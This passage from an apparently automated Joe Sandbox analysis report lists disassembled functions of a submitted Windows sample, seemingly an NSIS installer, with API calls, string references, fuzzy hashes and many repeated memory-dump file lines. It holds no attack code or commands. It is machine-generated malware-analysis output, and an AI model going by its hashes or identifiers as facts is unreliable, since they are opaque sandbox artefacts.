Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
Instruction ID: 5915ba61491c244e76e1eaab0aa102c6a5e0f3d841db56a12d121f6c77e1b82d
Opcode Fuzzy Hash: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
Instruction Fuzzy Hash: E621C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605F61D0D7B889409B18

Function 00404ABB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
wsprintfW.USER32 ref: 00404B65
SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78

Strings

%u.%u%s%s, xrefs: 00404B46

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: e544acf4f0842c60a9c18385703c419e840f736fd1e164df9e130a51ba0441a7
Instruction ID: c6a8333de7f2a0e63f9e82a7fb0d3590b97a2c0368f8d4fe0eecd184368e2ceb
Opcode Fuzzy Hash: e544acf4f0842c60a9c18385703c419e840f736fd1e164df9e130a51ba0441a7
Instruction Fuzzy Hash: 5711DB736041282BDB00656D9C41F9E329CDB86334F15423BFB25F21D1D978DC1186E8

Function 00402598 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,0040B5A8,000000FF,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,00000400,?,?,00000021), ref: 004025E8
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,?,?,0040B5A8,000000FF,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,00000400,?,?,00000021), ref: 004025F3

Strings

C:\Users\user\AppData\Local\Temp\nsu4D43.tmp, xrefs: 004025B3, 004025DA, 004025EE, 0040263A

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsu4D43.tmp
API String ID: 3109718747-3340595530
Opcode ID: bac47df6fb5c15672e847bcd90d072063b8e9d74f7c5b2892f2d21255f34aeb3
Instruction ID: 4bb1670e371a3de23f361dcee459543bcfcf4636ee0f51b5b5a9e7d0ab821041
Opcode Fuzzy Hash: bac47df6fb5c15672e847bcd90d072063b8e9d74f7c5b2892f2d21255f34aeb3
Instruction Fuzzy Hash: DB11CB72A05300BEDB046FB18E8999F7664AF54399F20843FF502F61D1D9FC89415B5E

Function 00405C17 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,?,?,76F93420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76F93420,00000000), ref: 00405C25
CharNextW.USER32(00000000), ref: 00405C2A
CharNextW.USER32(00000000), ref: 00405C42

Strings

C:\Users\user\AppData\Local\Temp\nsu4D43.tmp, xrefs: 00405C18

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: CharNext
String ID: C:\Users\user\AppData\Local\Temp\nsu4D43.tmp
API String ID: 3213498283-3340595530
Opcode ID: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
Instruction ID: 6a9d977fbe5713998eb834b7ad01fe533960ca492682b5c2b36711c34b001c28
Opcode Fuzzy Hash: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
Instruction Fuzzy Hash: DDF0F061808B1095FB3176644C88E7B66BCEB55360B04803BE641B72C0D3B84DC18EAA

Function 00405B6C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403359,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004035B6,?,00000006,00000008,0000000A), ref: 00405B72
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403359,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004035B6,?,00000006,00000008,0000000A), ref: 00405B7C
lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B8E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B6C

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-297319885
Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
Instruction ID: 803477e47080facc391f0cecd2807ccdb00b9d1fdb40608b9d44cb66137c19bb
Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
Instruction Fuzzy Hash: 3BD0A731501A30AAC111BB449D04DDF72ACDE45304342047FF101B31A2C7BC2D5287FD

Function 00402E79 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
GetTickCount.KERNEL32 ref: 00402EAA
CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
Instruction ID: b514363a92e965461d88eaa206c20d0702a544c8e4880045d1c7c79aac8a479e
Opcode Fuzzy Hash: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
Instruction Fuzzy Hash: 3AF05E30966A21EBC6606B24FE8CA8B7B64FB44B01711887BF001B11B4DA7C4892CBDC

Function 00405C74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4

Part of subcall function 00405C17: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,?,?,76F93420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76F93420,00000000), ref: 00405C25
Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C2A
Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C42

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,?,?,76F93420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76F93420,00000000), ref: 00405CCD
GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,?,?,76F93420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76F93420), ref: 00405CDD

Strings

C:\Users\user\AppData\Local\Temp\nsu4D43.tmp, xrefs: 00405C7A, 00405C7F, 00405C85, 00405CC6, 00405CCC, 00405CD4, 00405CDC

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsu4D43.tmp
API String ID: 3248276644-3340595530
Opcode ID: f876970076993f733f9246bd8c2efe22564afd40dcf2357ec22258bdd39e6079
Instruction ID: 850bfc7ffc9f89e8bebb6f59b63454ed566b5c4d810398842941662e03732b0e
Opcode Fuzzy Hash: f876970076993f733f9246bd8c2efe22564afd40dcf2357ec22258bdd39e6079
Instruction Fuzzy Hash: 82F0D625019F5216F622363A4D09AAF1954CE82364B0A013FF891722C1DB3C8942DD6E

Function 00405273 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004052A2
CallWindowProcW.USER32(?,?,?,?), ref: 004052F3

Part of subcall function 0040425A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040426C

Strings

, xrefs: 00405283

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 1596ab6e3354de94528cf133c19516d9ce94324b0b8efb63eeb8625a5778ab08
Instruction ID: beea61cd65c8703650dc93cdae6e0720761c29505c5582e3341eda9a3c117467
Opcode Fuzzy Hash: 1596ab6e3354de94528cf133c19516d9ce94324b0b8efb63eeb8625a5778ab08
Instruction Fuzzy Hash: BD01BC71200608AFEB208F11DD80AAB3B25EF85355F20807FFA01761D0C73A8C919F2E

Function 004038F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76F93420,004038CA,004036E0,00000006,?,00000006,00000008,0000000A), ref: 0040390C
GlobalFree.KERNEL32(00000000), ref: 00403913

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403904

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-297319885
Opcode ID: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
Instruction ID: 827a6d7c30b52d61f5a2dbff04e35f254d4b7381da6d9dc608e34789494937b8
Opcode Fuzzy Hash: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
Instruction Fuzzy Hash: 58E0CD334010205BC6115F04FE0475A77685F45B22F16003BFC807717147B41C538BC8

Function 00405BB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ln5S7fIBkY.exe,C:\Users\user\Desktop\ln5S7fIBkY.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BBE
CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ln5S7fIBkY.exe,C:\Users\user\Desktop\ln5S7fIBkY.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BCE

Strings

C:\Users\user\Desktop, xrefs: 00405BB8

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-2743851969
Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
Instruction ID: d1e11866c06308db2688671cfe2e39cf8e5f3b64411c1caee3e249c785e2e979
Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
Instruction Fuzzy Hash: BDD05EB34109209AC3126B08DC00D9F77BCEF11301746486AF440A6161D7786C8186AD

Function 00405CF2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D02
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D1A
CharNextA.USER32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D2B
lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D34

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
